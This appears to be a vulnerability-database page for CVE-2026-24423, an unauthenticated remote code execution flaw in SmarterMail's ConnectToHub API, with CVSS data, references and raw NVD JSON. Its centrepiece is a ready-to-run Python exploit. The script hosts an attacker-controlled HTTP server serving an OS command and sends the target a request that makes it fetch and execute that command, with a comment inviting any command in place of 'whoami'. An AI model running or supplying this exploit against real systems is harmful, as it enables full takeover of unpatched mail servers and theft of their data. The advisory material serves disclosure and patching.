CVE-2026-24423

Description

SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method. The attacker could point the SmarterMail to the malicious HTTP server, which serves the malicious OS command. This command will be executed by the vulnerable application.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:smartertools:smartermail:*:*:*:*:*:*:*:* - VULNERABLE

SmarterMail < build 9511

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2026-24423 PoC - SmarterMail ConnectToHub Unauthenticated RCE
# Note: This PoC is for educational and authorized testing purposes only

import http.server
import socketserver
import threading
import requests
import sys

class MaliciousHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # Send malicious response with OS command
        # Modify 'whoami' to any desired command
        malicious_response = "whoami"
        self.send_response(200)
        self.send_header('Content-type', 'text/plain')
        self.end_headers()
        self.wfile.write(malicious_response.encode())
    
    def log_message(self, format, *args):
        pass  # Suppress logging

def start_malicious_server(port=8080):
    with socketserver.TCPServer(("", port), MaliciousHandler) as httpd:
        httpd.handle_request()  # Handle single request

def exploit_target(target_url, attacker_ip, attacker_port=8080):
    # Start malicious HTTP server in background thread
    server_thread = threading.Thread(target=start_malicious_server, args=(attacker_port,))
    server_thread.daemon = True
    server_thread.start()
    
    # Construct the malicious request to ConnectToHub API
    # The target SmarterMail server will connect back to our server
    endpoint = f"{target_url}/api/v1/connectToHub"
    payload = {
        "serverAddress": f"http://{attacker_ip}:{attacker_port}"
    }
    
    try:
        print(f"[*] Sending exploit to {endpoint}...")
        response = requests.post(endpoint, json=payload, timeout=30)
        print(f"[+] Response status: {response.status_code}")
        print(f"[*] Check attacker server for command execution result")
        return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <target_url> <attacker_ip> <attacker_port>")
        print(f"Example: {sys.argv[0]} http://target:17001 192.168.1.100 8080")
        sys.exit(1)
    
    target = sys.argv[1]
    attacker_ip = sys.argv[2]
    attacker_port = int(sys.argv[3])
    
    exploit_target(target, attacker_ip, attacker_port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-24423
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-24423
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-24423/
[4] VulDB https://vuldb.com/cve/CVE-2026-24423
[5] https://code-white.com/public-vulnerability-list/#systemadminsettingscontrollerconnecttohub-missing-authentication-in-smartermail
[6] https://www.smartertools.com/smartermail/release-notes/current
[7] https://www.vulncheck.com/advisories/smartertools-smartermail-unauthenticated-rce-via-connecttohub-api
[8] https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-24423

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-24423", "sourceIdentifier": "[email protected]", "published": "2026-01-23T17:16:13.483", "lastModified": "2026-02-06T16:45:15.323", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method. The attacker could point the SmarterMail to the malicious HTTP server, which serves the malicious OS command. This command will be executed by the vulnerable application."}, {"lang": "es", "value": "Las versiones de SmarterTools SmarterMail anteriores a la compilación 9511 contienen una vulnerabilidad de ejecución remota de código no autenticada en el método API ConnectToHub. El atacante podría dirigir SmarterMail al servidor HTTP malicioso, que sirve el comando malicioso del sistema operativo. Este comando será ejecutado por la aplicación vulnerable."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "cisaExploitAdd": "2026-02-05", "cisaActionDue": "2026-02-26", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "SmarterTools SmarterMail Missing Authentication for Critical Function Vulnerability", "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:smartertools:smartermail:*:*:*:*:*:*:*:*", "versionEndExcluding": "100.0.9511", "matchCriteriaId": "D508C7EA-385D-428C-ACD3-9E2F93F0FB31"}]}]}], "references": [{"url": "https://code-white.com/public-vulnerability-list/#systemadminsettingscontrollerconnecttohub-missing-authentication-in-smartermail", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.smartertools.com/smartermail/release-notes/current", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/smartertools-smartermail-unauthenticated-rce-via-connecttohub-api", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-24423", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["US Government Resource"]}]}}